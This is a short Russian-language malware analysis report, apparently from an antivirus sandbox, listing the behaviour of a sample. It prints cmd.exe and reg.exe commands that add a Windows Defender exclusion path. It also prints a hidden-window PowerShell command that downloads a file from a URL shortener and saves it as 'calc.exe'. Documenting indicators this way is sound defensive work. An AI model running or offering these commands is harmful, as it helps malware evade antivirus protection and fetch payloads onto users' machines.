Техническая информация
- [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] 'C:\Test' = ''
- 'sh##turl.at':443
- 'pk#.goog':80
- http://pk#.goog/gsr1/gsr1.crt
- 'sh##turl.at':443
- DNS ASK sh##turl.at
- DNS ASK pk#.goog
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Test" /t REG_SZ /d "" /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Test" /t REG_SZ /d "" /f
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Invoke-WebRequest -Uri 'https://shorturl.at/WkvGv' -OutFile '%HOMEPATH%\Downloads\calc.exe'" (со скрытым окном)